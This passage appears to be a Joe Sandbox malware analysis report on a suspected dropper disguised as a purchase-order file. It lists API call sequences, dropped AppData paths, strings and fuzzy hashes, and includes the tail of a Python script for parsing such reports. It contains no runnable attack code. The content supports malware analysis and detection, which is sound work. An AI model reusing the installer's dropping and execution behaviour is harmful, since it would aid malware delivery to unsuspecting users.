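• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
• Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
• Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003FB), ref: 004045FE
• SetWindowTextW.USER32(00000000,?), ref: 00404628
• SHBrowseForFolderW.SHELL32(?), ref: 004046D9
• CoTaskMemFree.OLE32(00000000), ref: 004046E4
• lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404716
• lstrcatW.KERNEL32(?,: Completed), ref: 00404722
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
  • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
• GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
  • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, rec.fields.get("API ID"), rec.fields.get("Instruction Fuzzy Hash"), api_sequence(rec))
```

The whole report page (or the "Download File" text of several reports) can be fed to `parse_records` unchanged; sorting by `ref` gives the static order of call sites inside one function, and the `Instruction Fuzzy Hash` / `Opcode ID` fields are what to key on when checking whether a function in a new sample is the same code as one seen here.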

APIs
• GetDlgItem.USER32(?,000003FB), ref: 004045FE
• SetWindowTextW.USER32(00000000,?), ref: 00404628
• SHBrowseForFolderW.SHELL32(?), ref: 004046D9
• CoTaskMemFree.OLE32(00000000), ref: 004046E4
• lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404716
• lstrcatW.KERNEL32(?,: Completed), ref: 00404722
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
  • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
  • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
  • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
  • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
  • Part of subcall function 004062E4: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
• GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
  • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
  • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
  • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: : Completed$A$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender
• API String ID: 2624150263-1919279478
• Opcode ID: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
• Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
• Opcode Fuzzy Hash: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
• Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
Strings
• C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten, xrefs: 00402154
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten
• API String ID: 542301482-4006481345
• Opcode ID: bad8c02c9a5232ae2fe7c83ed2c0402b497b8bb1bc98c16d71f743dd1851b813
• Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
• Opcode Fuzzy Hash: bad8c02c9a5232ae2fe7c83ed2c0402b497b8bb1bc98c16d71f743dd1851b813
• Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID:
• String ID: p!C$p!C
• API String ID: 0-3125587631
• Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
• Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
• Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
• Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
• Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
• Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
• Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
Uniqueness

Uniqueness Score: -1.00%

APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
• GetDlgItem.USER32(?,000003E8), ref: 00404363
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
• GetSysColor.USER32(?), ref: 00404391
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
• lstrlenW.KERNEL32(?), ref: 004043B2
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
• GetDlgItem.USER32(?,0000040A), ref: 0040442D
• SendMessageW.USER32(00000000), ref: 00404434
• GetDlgItem.USER32(?,000003E8), ref: 0040445F
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
• LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
• SetCursor.USER32(00000000), ref: 004044B3
• ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,00000001), ref: 004044C8
• LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
• SetCursor.USER32(00000000), ref: 004044D7
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404506
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: (B@$: Completed$N$open
• API String ID: 3615053054-2720870854
• Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
• Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
• Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
• Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,Podning Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F$Podning Setup
• API String ID: 941294808-3382129368
• Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
• Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
• Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
• Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
Uniqueness

Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32(004308E8,NUL), ref: 00405D8E
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
                                                                                              • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
                                                                                                • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                              • GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
                                                                                              • wsprintfA.USER32 ref: 00405DF6
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                              • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405EDF
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
                                                                                                • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C29
                                                                                                • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                                                              • API String ID: 222337774-899692902
                                                                                              • Opcode ID: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                              • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                                                              • Opcode Fuzzy Hash: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                              • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
• CharNextW.USER32(?,?,?,00000000), ref: 00406356
• CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
• CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
• "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe", xrefs: 004062E4
• *?|<>/":, xrefs: 00406336
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-586655422
• Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
• Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
• Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
• Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404198
• GetSysColor.USER32(00000000), ref: 004041B4
• SetTextColor.GDI32(?,00000000), ref: 004041C0
• SetBkMode.GDI32(?,?), ref: 004041CC
• GetSysColor.USER32(?), ref: 004041DF
• SetBkColor.GDI32(?,?), ref: 004041EF
• DeleteObject.GDI32(?), ref: 00404209
• CreateBrushIndirect.GDI32(?), ref: 00404213
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
• Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
• Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
• Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
Uniqueness
Uniqueness Score: -1.00%
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
  • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
• Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
• Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
• Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
Uniqueness
Uniqueness Score: -1.00%
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
• GetMessagePos.USER32 ref: 00404A9C
• ScreenToClient.USER32(?,?), ref: 00404AB6
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
• Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
• Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
• Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
Uniqueness
Uniqueness Score: -1.00%
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                              • MulDiv.KERNEL32(0008255E,00000064,00082562), ref: 00402D4D
                                                                                              • wsprintfW.USER32 ref: 00402D5D
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 00402D57
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                              • Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
                                                                                              • Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                              • Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                              • GetLastError.KERNEL32 ref: 004056D5
